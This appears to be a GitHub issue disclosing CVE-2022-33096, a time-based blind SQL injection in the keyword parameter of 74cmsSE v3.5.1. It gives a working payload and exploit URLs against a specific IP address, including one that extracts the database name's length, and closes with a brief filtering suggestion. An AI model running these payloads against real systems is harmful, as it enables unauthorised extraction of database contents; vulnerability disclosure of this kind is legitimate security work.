CVE-2022-33096: SQL Injection vulnerability · Issue #9 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link：http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.

POC:
Payload：
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

In the path:
/v1_0/home/resume/index
is not strictly filtered for $keyword, resulting in SQL injection
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above it is possible that the sleep() function being executed twice.
Time blinds are possible to guess the length of the database:
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is “qscms2” , and the delay as exactly double the length of database(), so the injection is successfull

It’s a time-based SQL injection
Suggest: Add a filter function to this parameter